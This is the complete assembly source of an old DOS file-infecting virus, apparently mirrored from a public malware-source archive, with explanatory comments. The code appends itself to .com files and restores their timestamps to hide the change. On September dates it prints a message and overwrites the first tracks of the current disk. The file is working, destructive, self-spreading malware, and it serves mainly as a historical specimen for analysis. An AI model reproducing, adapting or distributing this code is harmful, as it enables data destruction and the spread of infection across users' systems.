mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2025-01-12 13:25:30 +00:00
225 lines
9.6 KiB
NASM
225 lines
9.6 KiB
NASM
|
;
|
|||
|
; ---- Data Segment Values ----
|
|||
|
; ds:[0f6h] = read buffer location
|
|||
|
; ds:[0f8h] = write buffer location
|
|||
|
; ds:[0fah] = store length of virus at this location
|
|||
|
; ds:[0fch] = store length of file to be infected at this location
|
|||
|
; ds:[0feh] = filename of file to infect
|
|||
|
;
|
|||
|
|
|||
|
.model tiny
|
|||
|
.code
|
|||
|
org 100h ; origin for .com files
|
|||
|
start:
|
|||
|
|
|||
|
nop ; these two nop instructs will be used by 'Nasty'
|
|||
|
nop ; to determine if a file is already infected
|
|||
|
|
|||
|
;******
|
|||
|
;get date
|
|||
|
;******
|
|||
|
mov ah,2ah ; get the date
|
|||
|
int 21h ; do it
|
|||
|
cmp dh,09h ; is it September?
|
|||
|
jnz do_not_activate ; if NO jmp do_not_activate
|
|||
|
;****
|
|||
|
;the nasty bit
|
|||
|
;****
|
|||
|
;*
|
|||
|
;* 1. Print message
|
|||
|
;*
|
|||
|
lea dx,mess ; print message
|
|||
|
mov ah,09 ; 'Nasty in September'
|
|||
|
int 21h ; do it
|
|||
|
;****
|
|||
|
;* 2. Destroy disk
|
|||
|
;****
|
|||
|
mov ah,19h ; get current drive (returned in al)
|
|||
|
int 21h ; do it
|
|||
|
mov dl,al ; dl = drive # to be formated
|
|||
|
mov ah,05 ; disk format function
|
|||
|
mov cl,01 ; first sector
|
|||
|
mov ch,00 ; first track
|
|||
|
mov dh,00 ; head zero
|
|||
|
mov al,10h ; 10h (16) sectors - 2 tracks
|
|||
|
int 13h ; do it (overwrite first 16 tracks on currently
|
|||
|
; selected disc)
|
|||
|
|
|||
|
|
|||
|
do_not_activate:
|
|||
|
mov cx,80h ; save parameters; set counter to 80h bytes
|
|||
|
mov si,0080h ; offset in the current data segment of the byte
|
|||
|
; to be copied
|
|||
|
mov di,0ff7fh ; offset to which byte is to be moved
|
|||
|
rep movsb ; move bytes until cx=0 (decrement cx by 1 each time
|
|||
|
; loop is performed is done automatically)
|
|||
|
; (increment by 1 of si & di is done automatically)
|
|||
|
|
|||
|
lea ax,begp ; load exit from program offset address into ax
|
|||
|
mov cx,ax ; " " " " " " " cx
|
|||
|
sub ax,100h ; subtract start of .com file address (100h) from ax
|
|||
|
; ax now contains the length of the virus
|
|||
|
|
|||
|
mov ds:[0fah],ax ; put length of the virus into the data segment at
|
|||
|
; offset 0fah
|
|||
|
add cx,fso ; add fso (5h) to cx (offset address of exit)
|
|||
|
; so, cx=cx+5
|
|||
|
mov ds:[0f8h],cx ; move cx (end of virus + 5) into data segment at
|
|||
|
; offset 0f8h. ** Start of the write buffer.
|
|||
|
ADD CX,AX ; add virus length (ax) to cx ?????
|
|||
|
mov ds:[0f6h],cx ; mov cx into data segment at offset 0f6h.
|
|||
|
; ** Start of the read buffer
|
|||
|
mov cx,ax ; mov length of virus into cx
|
|||
|
lea si,start ; load address of 'start' (start of virus) into
|
|||
|
; souce index
|
|||
|
mov di,ds:[0f8h] ; mov the value of the write buffer (@ 0f8h) into
|
|||
|
; destination index
|
|||
|
|
|||
|
|
|||
|
rb: ; cx = counter (length of virus)
|
|||
|
; si = offset of byte to be read
|
|||
|
; di = offset of where to write byte to
|
|||
|
; (auto decrement of cx & increment of si & di)
|
|||
|
rep movsb ; copy the virus into memory
|
|||
|
|
|||
|
stc ; set the carry flag
|
|||
|
|
|||
|
lea dx,file_type_to_infect ; set infector for .com files only
|
|||
|
mov ah,4eh ; find first file with specified params
|
|||
|
mov cx,20h ; files with archive bit set
|
|||
|
int 21h ; do it
|
|||
|
; if file found, CF is cleared, else
|
|||
|
; CF is set
|
|||
|
|
|||
|
or ax,ax ; works the below instructions (jz & jmp)
|
|||
|
jz file_found ; if file found jmp file_found
|
|||
|
jmp done ; if no file found, jmp done (exit virus)
|
|||
|
|
|||
|
file_found:
|
|||
|
mov ah,2fh ; get dta (returned in es:bx)
|
|||
|
int 21h ; do it
|
|||
|
|
|||
|
mov ax,es:[bx+1ah] ; mov size of file to be infected into ax
|
|||
|
mov ds:[0fch],ax ; mov filesize into ds:[0fch]
|
|||
|
add bx,1eh ; bx now points to asciz filename
|
|||
|
mov ds:[0feh],bx ; mov filename into ds:[0feh]
|
|||
|
clc ; clear carry flag
|
|||
|
|
|||
|
mov ax,3d02h ; open file for r/w (ds:dx -> asciz filename)
|
|||
|
mov dx,bx ; mov filename into dx
|
|||
|
int 21h ; do it (ax contains file handle)
|
|||
|
|
|||
|
mov bx,ax ; mov file handle into bx
|
|||
|
|
|||
|
mov ax,5700h ; get time & date attribs from file to infect
|
|||
|
int 21h ; do it (file handle in bx)
|
|||
|
push cx ; save time to the stack
|
|||
|
push dx ; save date to the stack
|
|||
|
|
|||
|
mov ah,3fh ; read from file to be infected
|
|||
|
mov cx,ds:[0fch] ; number of bytes to be read (filesize of file to
|
|||
|
; be infected
|
|||
|
mov dx,ds:[0f6h] ; buffer (where to read bytes to)
|
|||
|
int 21h ; do it
|
|||
|
|
|||
|
mov bx,dx ; mov buffer location to bx
|
|||
|
mov ax,[bx] ; mov contents of bx (first two bytes - as bx is
|
|||
|
; 16-bits) into ax.
|
|||
|
|
|||
|
; Now check to see if file is infected... if the
|
|||
|
; file is infected, it's first two bytes will be
|
|||
|
; 9090h (nop nop)
|
|||
|
|
|||
|
sub ax,9090h ; If file is already infected, zero flag will be set
|
|||
|
; thus jump to fin(ish)
|
|||
|
jz fin
|
|||
|
|
|||
|
|
|||
|
mov ax,ds:[0fch] ; mov filesize of file to be infected into ax
|
|||
|
mov bx,ds:[0f6h] ; mov where-to-read-to buffer into bx
|
|||
|
|
|||
|
mov [bx-2],ax ; correct old len
|
|||
|
|
|||
|
mov ah,3ch ; Create file with handle
|
|||
|
mov cx,00h ; cx=attribs -- set no attributes
|
|||
|
mov dx,ds:[0feh] ; point to name
|
|||
|
clc ; clear carry flag
|
|||
|
int 21h ; create file
|
|||
|
; Note: If filename already exists, (which it does)
|
|||
|
; truncate the filelength to zero - this is ok as
|
|||
|
; we have already copied the file to be infected
|
|||
|
; into memory.
|
|||
|
|
|||
|
mov bx,ax ; mov file handle into bx
|
|||
|
mov ah,40h ; write file with handle (write to the file to be
|
|||
|
; infected) - length currently zero
|
|||
|
; cx=number of bytes to write
|
|||
|
mov cx,ds:[0fch] ; length of file to be infected
|
|||
|
add cx,ds:[0fah] ; length of virus
|
|||
|
mov DX,ds:[0f8h] ; location of write buffer (this contains the virus
|
|||
|
; + the file to be infected)
|
|||
|
int 21h ; write file
|
|||
|
; new file = virus + file to be infected
|
|||
|
|
|||
|
mov ax,5701h ; restore original time & date values
|
|||
|
pop dx ; get old date from the stack
|
|||
|
pop cx ; get old time from the stack
|
|||
|
int 21h ; do it
|
|||
|
; Note: Infected file will now carry the time & date
|
|||
|
; it had before the infection.
|
|||
|
|
|||
|
mov ah,3eh ; close file (bx=file handle)
|
|||
|
int 21h ; do it
|
|||
|
; Note: date & time stamps automatically updated if
|
|||
|
; file written to.
|
|||
|
|
|||
|
fin:
|
|||
|
stc ; set carry flags
|
|||
|
mov ah,4fh ; find next file (.com)
|
|||
|
int 21h ; do it
|
|||
|
or ax,ax ; decides zero flag outcome
|
|||
|
jnz done ; if no more .com files, jmp done
|
|||
|
JMP file_found ; else begin re-infection process for new file.
|
|||
|
|
|||
|
done:
|
|||
|
mov cx,80h ; set counter (cx) = 80h
|
|||
|
mov si,0ff7fh ; source offset address (copy from here)
|
|||
|
mov di,0080h ; destination offset address (copy to here)
|
|||
|
rep movsb ; copy bytes! (cx is auto decremented by 1
|
|||
|
; si & di are auto incremented by 1)
|
|||
|
; Note: this is a 'restore parameters' feature
|
|||
|
; this does the reverse of what what done earlier
|
|||
|
; in the program (do_not_activate:)
|
|||
|
|
|||
|
mov ax,0a4f3h ;
|
|||
|
mov ds:[0fff9h],ax ;
|
|||
|
mov al,0eah ;
|
|||
|
mov ds:[0fffbh],al ; reset data segment locations ??? (to previous
|
|||
|
mov ax,100h ; values before virus infection)
|
|||
|
mov ds:[0fffch],ax ;
|
|||
|
lea si,begp ; load exit from program offset address into si
|
|||
|
lea di,start ; load offset address of start of virus into di
|
|||
|
mov ax,cs
|
|||
|
mov ds:[0fffeh],ax ; re-align cs = ds ???
|
|||
|
mov kk,ax
|
|||
|
mov cx,fso
|
|||
|
|
|||
|
db 0eah ; define byte
|
|||
|
dw 0fff9h ; define word
|
|||
|
kk dw 0000h ; define kk = word
|
|||
|
|
|||
|
mess db 'Sad virus - 24/8/91',13,10,'$' ; virus message to display
|
|||
|
|
|||
|
file_type_to_infect db '*?.com',0 ; infect only .com files.
|
|||
|
|
|||
|
fso dw 0005h ; store 5 into 'fso'. dw means that fso is 2 bytes
|
|||
|
; in size (a word)
|
|||
|
; ----- alma mater
|
|||
|
|
|||
|
|
|||
|
begp:
|
|||
|
mov ax,4c00h ; normal dos termination (set al to 00)
|
|||
|
int 21h ; do it
|
|||
|
|
|||
|
end start
|
|||
|
|